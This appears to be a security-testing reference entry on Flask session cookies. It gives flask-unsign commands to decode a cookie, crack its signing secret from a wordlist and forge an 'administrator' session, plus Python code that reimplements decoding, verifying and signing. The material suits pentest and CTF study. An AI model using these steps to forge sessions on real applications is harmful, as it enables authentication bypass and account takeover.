Flask Cookies

Flask session cookies have their own structure, similar to JWT. The payload can be decoded without a key, but producing a valid cookie requires the signing key. Cookies are not encrypted but signed, so the signing key can sometimes be brute-forced or found via a wordlist.

Using flask-unsign, decoding the cookie can be done via

flask-unsign --decode --cookie '<COOKIE>'

Unsigning the cookie (recovering the secret from a wordlist) can be done in the following way

flask-unsign --wordlist $WORDLIST --unsign --cookie '<COOKIE>' --no-literal-eval

Signing the cookie with a known secret can be done via

flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '<Secret>'
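As an added example (not part of this compendium and not flask-unsign's code), the three operations above implemented from the Python standard library against Flask's actual cookie format: URL-safe base64 payload (a leading `.` marks zlib compression), a timestamp, and an HMAC-SHA1 over both, keyed with HMAC-SHA1(secret, "cookie-session") as itsdangerous derives it. It shows why the session data is readable without the key while a valid signature is not. The secret and session values are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # fixed salt Flask passes to itsdangerous


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")

def _b64d(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))

def _key(secret: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret, salt)
    return hmac.new(secret, SALT, hashlib.sha1).digest()


def decode_payload(cookie: str) -> dict:
    """Read the session data with no key: it is only base64 (zlib if it starts with '.')."""
    raw = cookie.encode()
    compressed = raw.startswith(b".")
    body = raw[1:] if compressed else raw
    data = _b64d(body.split(b".")[0])
    return json.loads(zlib.decompress(data) if compressed else data)


def verify(cookie: str, secret: bytes) -> Optional[dict]:
    """Return the session only if the HMAC over '<payload>.<timestamp>' checks out."""
    value, _, sig = cookie.encode().rpartition(b".")
    expected = _b64e(hmac.new(_key(secret), value, hashlib.sha1).digest())
    if not hmac.compare_digest(expected, sig):
        return None
    return decode_payload(cookie)


def sign(session: dict, secret: bytes, now: Optional[int] = None) -> str:
    """Mint a cookie the way the server does (requires the real SECRET_KEY)."""
    data = json.dumps(session, separators=(",", ":")).encode()
    packed = zlib.compress(data)
    # itsdangerous compresses only when that saves space and marks it with a leading '.'
    payload = b"." + _b64e(packed) if len(packed) < len(data) - 1 else _b64e(data)
    ts = int(time.time()) if now is None else now
    value = payload + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    return (value + b"." + _b64e(hmac.new(_key(secret), value, hashlib.sha1).digest())).decode()
```

Plain str/int/bool values round-trip as shown; Flask's TaggedJSONSerializer wraps less common types (tuples, bytes, datetimes) in tags that a reader of the raw JSON will see as small dicts.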